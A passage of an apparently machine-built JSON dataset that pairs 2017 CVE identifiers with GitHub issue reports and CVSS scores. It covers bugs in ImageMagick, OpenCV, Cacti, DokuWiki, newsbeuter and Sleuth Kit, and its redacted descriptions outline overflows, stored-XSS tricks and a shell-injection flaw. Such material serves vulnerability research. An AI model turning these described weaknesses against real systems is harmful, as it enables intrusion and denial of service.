  8086. "exploitabilityScore": 2.8
  8087. },
  8088. {
  8089. "CVE_ID": "CVE-2017-12863",
  8090. "Issue_Url_old": "https://github.com/opencv/opencv/issues/9371",
  8091. "Issue_Url_new": "https://github.com/opencv/opencv/issues/9371",
  8092. "Repo_new": "opencv/opencv",
  8093. "Issue_Created_At": "2017-08-15T06:18:34Z",
  8094. "description": "integer overflow in APITAG System information (version) APITAG NUMBERTAG Operating System / Platform => Ubuntu NUMBERTAG Compiler => g++ Detailed description integer overflow in APITAG PATHTAG runtime error: signed integer overflow NUMBERTAG cannot be represented in type 'int' PATHTAG runtime error: signed integer overflow NUMBERTAG cannot be represented in type 'int' PATHTAG runtime error: signed integer overflow NUMBERTAG cannot be represented in type 'int' PATHTAG bool APITAG Mat& img NUMBERTAG int src_pitch = (m_width m_bpp bit_depth NUMBERTAG int nch = CV_MAT_CN(m_type); int width3 = m_width nch; Steps to reproduce APITAG poc is here: URLTAG",
  8095. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  8096. "severity": "HIGH",
  8097. "baseScore": 8.8,
  8098. "impactScore": 5.9,
  8099. "exploitabilityScore": 2.8
  8100. },
  8101. {
  8102. "CVE_ID": "CVE-2017-12864",
  8103. "Issue_Url_old": "https://github.com/opencv/opencv/issues/9372",
  8104. "Issue_Url_new": "https://github.com/opencv/opencv/issues/9372",
  8105. "Repo_new": "opencv/opencv",
  8106. "Issue_Created_At": "2017-08-15T06:22:28Z",
  8107. "description": "Integer overflow in APITAG System information (version) APITAG NUMBERTAG Operating System / Platform => Ubuntu NUMBERTAG Compiler => g++ Detailed description integer overflow in APITAG PATHTAG runtime error: signed integer overflow NUMBERTAG cannot be represented in type 'int' static int APITAG APITAG strm, int maxdigits NUMBERTAG do { val = val NUMBERTAG code NUMBERTAG if( ++digits >= maxdigits ) break; code = APITAG } while( isdigit(code)); Steps to reproduce APITAG poc is here: URLTAG",
  8108. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  8109. "severity": "HIGH",
  8110. "baseScore": 8.8,
  8111. "impactScore": 5.9,
  8112. "exploitabilityScore": 2.8
  8113. },
  8114. {
  8115. "CVE_ID": "CVE-2017-12875",
  8116. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/659",
  8117. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/659",
  8118. "Repo_new": "imagemagick/imagemagick",
  8119. "Issue_Created_At": "2017-08-08T01:53:32Z",
  8120. "description": "cpu exhaustion in APITAG Version: APITAG NUMBERTAG Q NUMBERTAG i NUMBERTAG FILETAG ./magick cpu poc2 /dev/null static APITAG APITAG APITAG magick_restrict APITAG magick_restrict nexus_info, APITAG exception) { ..... switch (cache_info >type) { case APITAG case APITAG { register Quantum magick_restrict q; / Write pixels to memory. / if ((cache_info >columns == nexus_info APITAG && (extent == APITAG ((size_t) extent))) { length=extent; rows NUMBERTAG UL; } q=cache_info >pixels+offset cache_info >number_channels; for (y NUMBERTAG y APITAG number_channels nexus_info APITAG q+=cache_info >columns cache_info >number_channels; } break; } case APITAG { / Write pixels to disk. / APITAG >file_semaphore); if APITAG == APITAG { ERRORTAG cache_info >cache_filename); APITAG >file_semaphore); APITAG } if ((cache_info >columns == nexus_info APITAG && (extent APITAG offset+offset cache_info >number_channels sizeof( p),length,(const unsigned char ) p); if (count != APITAG length) break; p+=cache_info >number_channels nexus_info APITAG offset+=cache_info >columns; } ..... } poc: URLTAG",
  8121. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  8122. "severity": "MEDIUM",
  8123. "baseScore": 6.5,
  8124. "impactScore": 3.6,
  8125. "exploitabilityScore": 2.8
  8126. },
  8127. {
  8128. "CVE_ID": "CVE-2017-12904",
  8129. "Issue_Url_old": "https://github.com/akrennmair/newsbeuter/issues/591",
  8130. "Issue_Url_new": "https://github.com/akrennmair/newsbeuter/issues/591",
  8131. "Repo_new": "akrennmair/newsbeuter",
  8132. "Issue_Created_At": "2017-08-17T20:48:21Z",
  8133. "description": "CVETAG ] Remote code execution. Dear users, Jeriko One discovered a vulnerability that allows a remote attacker to execute arbitrary code on your computer. An attacker can craft an RSS item with shell code in the title and/or URL. When you bookmark such an item, your shell will execute that code. The vulnerability is triggered when APITAG is called; if you abort bookmarking before that, you're safe. Newsbeuter versions NUMBERTAG through NUMBERTAG are affected. Workaround ========== First of all, set APITAG to no (that's the default.) This gives you a chance to review inputs before executing your APITAG . Second, when bookmarking items, pay close attention to titles and URLs. I can't possibly teach you how to recognize shell code in just a few paragraphs, so if unsure, just don't bookmark the thing. Resolution ========== A fix has already been pushed to our Git repository: URLTAG I managed to get in touch with maintainers in AUR, Debian, APITAG and Gentoo, so if you're running one of those, an update should arrive soon. If you're running something else, I encourage you to find out who maintains Newsbeuter for your distribution, contact them and point to the aforementioned commit. They'll know what to do. Call to security researchers ============================ If you discover a vulnerability, please disclose it to me privately at eual. EMAILTAG , preferably encrypting the message for PGP key NUMBERTAG A NUMBERTAG C8BFD NUMBERTAG APITAG has also been posted [on our mailing list URLTAG .",
  8134. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  8135. "severity": "HIGH",
  8136. "baseScore": 8.8,
  8137. "impactScore": 5.9,
  8138. "exploitabilityScore": 2.8
  8139. },
  8140. {
  8141. "CVE_ID": "CVE-2017-12927",
  8142. "Issue_Url_old": "https://github.com/Cacti/cacti/issues/907",
  8143. "Issue_Url_new": "https://github.com/cacti/cacti/issues/907",
  8144. "Repo_new": "cacti/cacti",
  8145. "Issue_Created_At": "2017-08-15T02:42:33Z",
  8146. "description": "xss in FILETAG via para method. it's not a high level vuln, maybe medium or low line NUMBERTAG echo __(\"FATAL: Spike Kill method '%s' is Invalid \", APITAG should change into echo __(\"FATAL: Spike Kill method '%s' is Invalid \", APITAG FILETAG I should found this at issue NUMBERTAG I'm sorry for the delay chen ruiqi codesafe team of qihoo NUMBERTAG",
  8147. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  8148. "severity": "MEDIUM",
  8149. "baseScore": 6.1,
  8150. "impactScore": 2.7,
  8151. "exploitabilityScore": 2.8
  8152. },
  8153. {
  8154. "CVE_ID": "CVE-2017-12978",
  8155. "Issue_Url_old": "https://github.com/Cacti/cacti/issues/918",
  8156. "Issue_Url_new": "https://github.com/cacti/cacti/issues/918",
  8157. "Repo_new": "cacti/cacti",
  8158. "Issue_Created_At": "2017-08-19T10:53:44Z",
  8159. "description": "Stored XSS in APITAG Lower risk, given that the account requires access to be able to add/edit external links to store the XSS, but line NUMBERTAG of FILETAG isn't sanitizing APITAG , resulting in stored XSS. CODETAG Although the title field in external_links is a varchar NUMBERTAG we can get around that restriction by creating multiple tabs and using comment blocks to keep the XSS valid: Create the first tab with title: APITAG Create second tab with title: APITAG FILETAG",
  8160. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  8161. "severity": "MEDIUM",
  8162. "baseScore": 5.4,
  8163. "impactScore": 2.7,
  8164. "exploitabilityScore": 2.3
  8165. },
  8166. {
  8167. "CVE_ID": "CVE-2017-12979",
  8168. "Issue_Url_old": "https://github.com/splitbrain/dokuwiki/issues/2080",
  8169. "Issue_Url_new": "https://github.com/dokuwiki/dokuwiki/issues/2080",
  8170. "Repo_new": "dokuwiki/dokuwiki",
  8171. "Issue_Created_At": "2017-08-16T20:59:34Z",
  8172. "description": "APITAG Stored XSS in FILETAG with code block. Bug Specific language parsed in code block is not checked or sanitized before rendering wiki content. Attacker can force admin to enable phpok in configuration through malicious javascript. Detail APITAG ERRORTAG APITAG APITAG",
  8173. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  8174. "severity": "MEDIUM",
  8175. "baseScore": 6.1,
  8176. "impactScore": 2.7,
  8177. "exploitabilityScore": 2.8
  8178. },
  8179. {
  8180. "CVE_ID": "CVE-2017-12980",
  8181. "Issue_Url_old": "https://github.com/splitbrain/dokuwiki/issues/2081",
  8182. "Issue_Url_new": "https://github.com/dokuwiki/dokuwiki/issues/2081",
  8183. "Repo_new": "dokuwiki/dokuwiki",
  8184. "Issue_Created_At": "2017-08-16T21:12:14Z",
  8185. "description": "APITAG Stored XSS in FILETAG with APITAG feed. Bug Author tag in APITAG feed is not well sanitized (with default config of APITAG it'll not be stripped html special characters, dokuwiki uses the result directly). So attacker can force others to request a remote APITAG feed contains malicious javascript to do requests in their permission. Detail APITAG ERRORTAG APITAG remote RSS ERRORTAG dokuwiki document APITAG",
  8186. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  8187. "severity": "MEDIUM",
  8188. "baseScore": 6.1,
  8189. "impactScore": 2.7,
  8190. "exploitabilityScore": 2.8
  8191. },
  8192. {
  8193. "CVE_ID": "CVE-2017-12982",
  8194. "Issue_Url_old": "https://github.com/uclouvain/openjpeg/issues/983",
  8195. "Issue_Url_new": "https://github.com/uclouvain/openjpeg/issues/983",
  8196. "Repo_new": "uclouvain/openjpeg",
  8197. "Issue_Created_At": "2017-08-14T11:33:02Z",
  8198. "description": "memory allocation failure in opj_aligned_alloc_n (opj_malloc.c). on NUMBERTAG ERRORTAG Testcase: URLTAG",
  8199. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  8200. "severity": "MEDIUM",
  8201. "baseScore": 5.5,
  8202. "impactScore": 3.6,
  8203. "exploitabilityScore": 1.8
  8204. },
  8205. {
  8206. "CVE_ID": "CVE-2017-12983",
  8207. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/682",
  8208. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/682",
  8209. "Repo_new": "imagemagick/imagemagick",
  8210. "Issue_Created_At": "2017-08-18T08:55:11Z",
  8211. "description": "Heap buffer overflow in APITAG zhihua. EMAILTAG .cn ERRORTAG POC URLTAG",
  8212. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  8213. "severity": "HIGH",
  8214. "baseScore": 8.8,
  8215. "impactScore": 5.9,
  8216. "exploitabilityScore": 2.8
  8217. },
  8218. {
  8219. "CVE_ID": "CVE-2017-13058",
  8220. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/666",
  8221. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/666",
  8222. "Repo_new": "imagemagick/imagemagick",
  8223. "Issue_Created_At": "2017-08-10T16:09:37Z",
  8224. "description": "memory leak in APITAG Version: APITAG NUMBERTAG Q NUMBERTAG A memory leak vulnerability was found in function APITAG in APITAG allow attackers to cause a denial of service via a crafted file. ERRORTAG testcase: URLTAG APITAG of Venustech",
  8225. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  8226. "severity": "MEDIUM",
  8227. "baseScore": 6.5,
  8228. "impactScore": 3.6,
  8229. "exploitabilityScore": 2.8
  8230. },
  8231. {
  8232. "CVE_ID": "CVE-2017-13059",
  8233. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/667",
  8234. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/667",
  8235. "Repo_new": "imagemagick/imagemagick",
  8236. "Issue_Created_At": "2017-08-10T16:10:04Z",
  8237. "description": "memory leak in APITAG Version: APITAG NUMBERTAG Q NUMBERTAG A memory leak vulnerability was found in function APITAG in APITAG allow attackers to cause a denial of service via a crafted file. ERRORTAG testcase: URLTAG APITAG of Venustech",
  8238. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  8239. "severity": "MEDIUM",
  8240. "baseScore": 6.5,
  8241. "impactScore": 3.6,
  8242. "exploitabilityScore": 2.8
  8243. },
  8244. {
  8245. "CVE_ID": "CVE-2017-13060",
  8246. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/644",
  8247. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/644",
  8248. "Repo_new": "imagemagick/imagemagick",
  8249. "Issue_Created_At": "2017-08-04T08:54:02Z",
  8250. "description": "memory leak in APITAG Version: APITAG NUMBERTAG Q NUMBERTAG A memory leak vulnerability was found in function APITAG ,which allow attackers to cause a denial of service (bad free) via a crafted file. ERRORTAG testcase: FILETAG APITAG of Venustech",
  8251. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  8252. "severity": "MEDIUM",
  8253. "baseScore": 6.5,
  8254. "impactScore": 3.6,
  8255. "exploitabilityScore": 2.8
  8256. },
  8257. {
  8258. "CVE_ID": "CVE-2017-13061",
  8259. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/645",
  8260. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/645",
  8261. "Repo_new": "imagemagick/imagemagick",
  8262. "Issue_Created_At": "2017-08-04T08:54:55Z",
  8263. "description": "memory exhaustion in APITAG Version: APITAG NUMBERTAG Q NUMBERTAG APITAG When identify PSD file , imagemagick will allocate memory to store the data, here is the critical code: psd.c , in function APITAG ERRORTAG The critical function call chain is APITAG APITAG APITAG in function APITAG ERRORTAG The string_info >length can be controlled by input file,here is my FILETAG to limit memory usage,but NUMBERTAG MB limit can be bypassed. APITAG testcase: FILETAG Credit : APITAG of Venustech",
  8264. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  8265. "severity": "MEDIUM",
  8266. "baseScore": 6.5,
  8267. "impactScore": 3.6,
  8268. "exploitabilityScore": 2.8
  8269. },
  8270. {
  8271. "CVE_ID": "CVE-2017-13062",
  8272. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/669",
  8273. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/669",
  8274. "Repo_new": "imagemagick/imagemagick",
  8275. "Issue_Created_At": "2017-08-11T02:50:43Z",
  8276. "description": "memory leak in APITAG Version: APITAG NUMBERTAG Q NUMBERTAG A memory leak vulnerability was found in function APITAG in APITAG allow attackers to cause a denial of service via a crafted file. ERRORTAG testcase: URLTAG APITAG of Venustech",
  8277. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  8278. "severity": "MEDIUM",
  8279. "baseScore": 6.5,
  8280. "impactScore": 3.6,
  8281. "exploitabilityScore": 2.8
  8282. },
  8283. {
  8284. "CVE_ID": "CVE-2017-13083",
  8285. "Issue_Url_old": "https://github.com/pbatard/rufus/issues/1009",
  8286. "Issue_Url_new": "https://github.com/pbatard/rufus/issues/1009",
  8287. "Repo_new": "pbatard/rufus",
  8288. "Issue_Created_At": "2017-08-28T15:47:42Z",
  8289. "description": "Rufus downloads updates over insecure HTTP. Checklist [x ] I looked at URLTAG to see if my question has already been answered. [x ] I performed a search in the issue tracker for similar issues, using keywords relevant to my problem. [x ] I clicked the Log button in Rufus and copy/pasted the log into the line that says APITAG below. [x ] The log I am copying is the FULL log, starting with the line APITAG I have NOT removed any part of it. Issue description Rufus checks for updates over HTTPS, however the update itself is downloaded over HTTP, which is insecure. See also: FILETAG Log CODETAG",
  8290. "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
  8291. "severity": "HIGH",
  8292. "baseScore": 8.1,
  8293. "impactScore": 5.9,
  8294. "exploitabilityScore": 2.2
  8295. },
  8296. {
  8297. "CVE_ID": "CVE-2017-13131",
  8298. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/676",
  8299. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/676",
  8300. "Repo_new": "imagemagick/imagemagick",
  8301. "Issue_Created_At": "2017-08-15T08:32:02Z",
  8302. "description": "memory leak in APITAG Version: APITAG NUMBERTAG Q NUMBERTAG A memory leak vulnerability was found in function APITAG in APITAG list.c ,which allow attackers to cause a denial of service via a crafted file. ERRORTAG testcase: URLTAG APITAG of Venustech",
  8303. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  8304. "severity": "MEDIUM",
  8305. "baseScore": 6.5,
  8306. "impactScore": 3.6,
  8307. "exploitabilityScore": 2.8
  8308. },
  8309. {
  8310. "CVE_ID": "CVE-2017-13132",
  8311. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/674",
  8312. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/674",
  8313. "Repo_new": "imagemagick/imagemagick",
  8314. "Issue_Created_At": "2017-08-14T16:25:20Z",
  8315. "description": "assertion failure in APITAG Version: APITAG NUMBERTAG Q NUMBERTAG An assertion failure was found in function APITAG in APITAG allow attackers to cause a denial of service via a crafted file. ERRORTAG testcase: URLTAG APITAG of Venustech",
  8316. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  8317. "severity": "MEDIUM",
  8318. "baseScore": 6.5,
  8319. "impactScore": 3.6,
  8320. "exploitabilityScore": 2.8
  8321. },
  8322. {
  8323. "CVE_ID": "CVE-2017-13133",
  8324. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/679",
  8325. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/679",
  8326. "Repo_new": "imagemagick/imagemagick",
  8327. "Issue_Created_At": "2017-08-16T16:11:37Z",
  8328. "description": "memory exhaustion in load_tile. Version: APITAG NUMBERTAG Q NUMBERTAG APITAG When identify xcf file , imagemagick will allocate memory to store the data, here is the critical code: (xcf.c , in function load_tile) APITAG The parameter \"data_length\" is passed from function load_level: ERRORTAG The \"offset2\" and \"offset\" can be read from input file (can be controlled). APITAG Here is my FILETAG to limit memory usage,but NUMBERTAG MB limit can be bypassed. APITAG testcase: URLTAG Credit: APITAG of Venustech",
  8329. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  8330. "severity": "MEDIUM",
  8331. "baseScore": 6.5,
  8332. "impactScore": 3.6,
  8333. "exploitabilityScore": 2.8
  8334. },
  8335. {
  8336. "CVE_ID": "CVE-2017-13134",
  8337. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/670",
  8338. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/670",
  8339. "Repo_new": "imagemagick/imagemagick",
  8340. "Issue_Created_At": "2017-08-12T05:12:16Z",
  8341. "description": "heap buffer overflow in APITAG Version: APITAG NUMBERTAG Q NUMBERTAG APITAG When identify SFW file ,a heap buffer overflow vulnerability was found in function APITAG in coders/sfw.c, Here is the critical code: ERRORTAG In function APITAG ERRORTAG The memory space of the heap buffer \"p\", is p~q (from p NUMBERTAG to p[q p NUMBERTAG but in the for loop of while,the \"p[i]\" will lead to heap buffer overflow. testcase: URLTAG APITAG of Venustech",
  8342. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  8343. "severity": "MEDIUM",
  8344. "baseScore": 6.5,
  8345. "impactScore": 3.6,
  8346. "exploitabilityScore": 2.8
  8347. },
  8348. {
  8349. "CVE_ID": "CVE-2017-13135",
  8350. "Issue_Url_old": "https://github.com/ebel34/bpg-web-encoder/issues/1",
  8351. "Issue_Url_new": "https://github.com/ebel34/bpg-web-encoder/issues/1",
  8352. "Repo_new": "ebel34/bpg-web-encoder",
  8353. "Issue_Created_At": "2017-11-16T00:15:04Z",
  8354. "description": "3 bugs for.",
  8355. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  8356. "severity": "HIGH",
  8357. "baseScore": 7.8,
  8358. "impactScore": 5.9,
  8359. "exploitabilityScore": 1.8
  8360. },
  8361. {
  8362. "CVE_ID": "CVE-2017-13140",
  8363. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/596",
  8364. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/596",
  8365. "Repo_new": "imagemagick/imagemagick",
  8366. "Issue_Created_At": "2017-07-21T17:02:55Z",
  8367. "description": "Potential DOS attack with pngs. Hi there I've discovered a potential DOS vulnerability in APITAG when dealing with PNGs. Is there a security reporting email I should contact, or shall I just post it here?",
  8368. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  8369. "severity": "MEDIUM",
  8370. "baseScore": 6.5,
  8371. "impactScore": 3.6,
  8372. "exploitabilityScore": 2.8
  8373. },
  8374. {
  8375. "CVE_ID": "CVE-2017-13141",
  8376. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/600",
  8377. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/600",
  8378. "Repo_new": "imagemagick/imagemagick",
  8379. "Issue_Created_At": "2017-07-23T13:59:51Z",
  8380. "description": "memory leak in APITAG Version: APITAG NUMBERTAG Q NUMBERTAG The APITAG function in APITAG allows attackers to cause a denial of service (memory leak) via a crafted file. ERRORTAG testcase : FILETAG Credit : APITAG of Venustech",
  8381. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  8382. "severity": "MEDIUM",
  8383. "baseScore": 6.5,
  8384. "impactScore": 3.6,
  8385. "exploitabilityScore": 2.8
  8386. },
  8387. {
  8388. "CVE_ID": "CVE-2017-13143",
  8389. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/362",
  8390. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/362",
  8391. "Repo_new": "imagemagick/imagemagick",
  8392. "Issue_Created_At": "2017-01-26T15:31:47Z",
  8393. "description": "use of uninitialized data in PATHTAG In issue NUMBERTAG an out of bounds read involving the mat image format has been fixed. After the fixing commits the buffer APITAG is large enough to deal with the APITAG file CVETAG that lead to issue NUMBERTAG However, after the fix the coder still accesses uninitialized data which might pose a security issue or at least a bug. The first undefined access happens within APITAG in a call to APITAG . The back part of the buffer APITAG is now large enough but does seemingly not contain any sensible data. I've tested this using the current APITAG master branch git revision APITAG Undefined access is detected by _valgrind_ using this command line: APITAG",
  8394. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  8395. "severity": "HIGH",
  8396. "baseScore": 7.5,
  8397. "impactScore": 3.6,
  8398. "exploitabilityScore": 3.9
  8399. },
  8400. {
  8401. "CVE_ID": "CVE-2017-13145",
  8402. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/501",
  8403. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/501",
  8404. "Repo_new": "imagemagick/imagemagick",
  8405. "Issue_Created_At": "2017-05-28T06:09:07Z",
  8406. "description": "Failed tests with NUMBERTAG and NUMBERTAG APITAG PATHTAG ERRORTAG",
  8407. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  8408. "severity": "MEDIUM",
  8409. "baseScore": 6.5,
  8410. "impactScore": 3.6,
  8411. "exploitabilityScore": 2.8
  8412. },
  8413. {
  8414. "CVE_ID": "CVE-2017-13658",
  8415. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/598",
  8416. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/598",
  8417. "Repo_new": "imagemagick/imagemagick",
  8418. "Issue_Created_At": "2017-07-23T13:55:02Z",
  8419. "description": "assertion failed in APITAG Version: APITAG NUMBERTAG Q NUMBERTAG A crafted file revealed an assertion failure in image.c. APITAG testcase \uff1a URLTAG Credit \uff1a APITAG of Venustech",
  8420. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  8421. "severity": "MEDIUM",
  8422. "baseScore": 6.5,
  8423. "impactScore": 3.6,
  8424. "exploitabilityScore": 2.8
  8425. },
  8426. {
  8427. "CVE_ID": "CVE-2017-13692",
  8428. "Issue_Url_old": "https://github.com/htacg/tidy-html5/issues/588",
  8429. "Issue_Url_new": "https://github.com/htacg/tidy-html5/issues/588",
  8430. "Repo_new": "htacg/tidy-html5",
  8431. "Issue_Created_At": "2017-08-24T09:57:54Z",
  8432. "description": "[bug] Segmentation Fault. Description This crash occurs at APITAG In function APITAG , the variable c equals to NUMBERTAG in this case). When function APITAG is called, it can cause Segmentation Fault. Version APITAG Address Sanitizer Output ERRORTAG GDB Information APITAG APITAG Contact me if you need Poc file at EMAILTAG or EMAILTAG",
  8433. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  8434. "severity": "HIGH",
  8435. "baseScore": 7.5,
  8436. "impactScore": 3.6,
  8437. "exploitabilityScore": 3.9
  8438. },
  8439. {
  8440. "CVE_ID": "CVE-2017-13755",
  8441. "Issue_Url_old": "https://github.com/sleuthkit/sleuthkit/issues/913",
  8442. "Issue_Url_new": "https://github.com/sleuthkit/sleuthkit/issues/913",
  8443. "Repo_new": "sleuthkit/sleuthkit",
  8444. "Issue_Created_At": "2017-08-25T19:50:41Z",
  8445. "description": "fls segfaults in iso NUMBERTAG proc_dir.. To reproduce: $ unzip FILETAG Archive: FILETAG inflating: segfault.img $ fls segfault.img Segmentation fault This bug was found using american fuzzy lop URLTAG and input files ultimately from FILETAG . Backtrace: ERRORTAG Input:",
  8446. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  8447. "severity": "MEDIUM",
  8448. "baseScore": 5.5,
  8449. "impactScore": 3.6,
  8450. "exploitabilityScore": 1.8
  8451. },
  8452. {
  8453. "CVE_ID": "CVE-2017-13756",
  8454. "Issue_Url_old": "https://github.com/sleuthkit/sleuthkit/issues/914",
  8455. "Issue_Url_new": "https://github.com/sleuthkit/sleuthkit/issues/914",
  8456. "Repo_new": "sleuthkit/sleuthkit",
  8457. "Issue_Created_At": "2017-08-25T20:38:17Z",
  8458. "description": "mmls hangs due to infinite looping of APITAG To reproduce: $ base NUMBERTAG d > FILETAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG $ unzip FILETAG Archive: FILETAG inflating: hang.img $ fls hang.img hangs here] This bug was found using [american fuzzy lop URLTAG and input files ultimately from FILETAG . Backtrace: CODETAG Input: See above. I can't attach the zip file, for unknown reasons.",
  8459. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  8460. "severity": "MEDIUM",
  8461. "baseScore": 5.5,
  8462. "impactScore": 3.6,
  8463. "exploitabilityScore": 1.8
  8464. },
  8465. {
  8466. "CVE_ID": "CVE-2017-13760",
  8467. "Issue_Url_old": "https://github.com/sleuthkit/sleuthkit/issues/906",
  8468. "Issue_Url_new": "https://github.com/sleuthkit/sleuthkit/issues/906",
  8469. "Repo_new": "sleuthkit/sleuthkit",
  8470. "Issue_Created_At": "2017-08-24T21:23:06Z",
  8471. "description": "fls hangs on corrupt exfat image.. To reproduce: $ unzip FILETAG Archive: FILETAG inflating: hang.img $ fls hang.img hangs here] This bug was found using [american fuzzy lop URLTAG and input files ultimately from FILETAG . Backtrace: CODETAG Input: FILETAG",
  8472. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  8473. "severity": "MEDIUM",
  8474. "baseScore": 5.5,
  8475. "impactScore": 3.6,
  8476. "exploitabilityScore": 1.8
  8477. },
  8478. {
  8479. "CVE_ID": "CVE-2017-13768",
  8480. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/706",
  8481. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/706",
  8482. "Repo_new": "imagemagick/imagemagick",
  8483. "Issue_Created_At": "2017-08-29T10:37:35Z",
  8484. "description": "Null Pointer Dereference in the APITAG function within PATHTAG A Null Pointer De reference vulnerability is occurring due to the vulnerable code in the APITAG function within PATHTAG The vulnerable code is as follows: ERRORTAG It is seen that _p_ is being explicitly checked whether it is NULL and if it is, it breaks out of the for loop. Now the subsequent for loop modifies the value of p but due to the break statement, this doesn't occur. Eventually, _p_ is being used as an argument here in the APITAG function: APITAG Looking at the definition, _p_ is passed into _const Quantum magick_restrict pixel_, which is the NUMBERTAG nd argument. This is being explicitly de referenced here: APITAG There should be a check to verify if a pointer is NULL or not before any operations are performed on it, if it depends on user input: APITAG",
  8485. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  8486. "severity": "MEDIUM",
  8487. "baseScore": 6.5,
  8488. "impactScore": 3.6,
  8489. "exploitabilityScore": 2.8
  8490. },
  8491. {
  8492. "CVE_ID": "CVE-2017-13769",
  8493. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/705",
  8494. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/705",
  8495. "Repo_new": "imagemagick/imagemagick",
  8496. "Issue_Created_At": "2017-08-29T09:51:25Z",
  8497. "description": "Array Index Out of Bounds and Potential Buffer Overflow due to user controlled value being used as Array Index. An issue affects PATHTAG in the APITAG function, where an externally controllable value is being used as an index in the process of generating a thumbnail image. This can lead to potential Buffer Overflow. The vulnerable code is: ERRORTAG Here the _offset_ variable gets its value from APITAG being run on an input image. This value of _offset_ is not being sanitized before it is being used as an array index in: APITAG It is also being used to generate the _thumbnail_image_ by calling the APITAG function, where the value of _const void blob_ depends on the value of offset. Validation is being performed on whether blob is NULL using: ERRORTAG However, there are no checks on whether it is too large.",
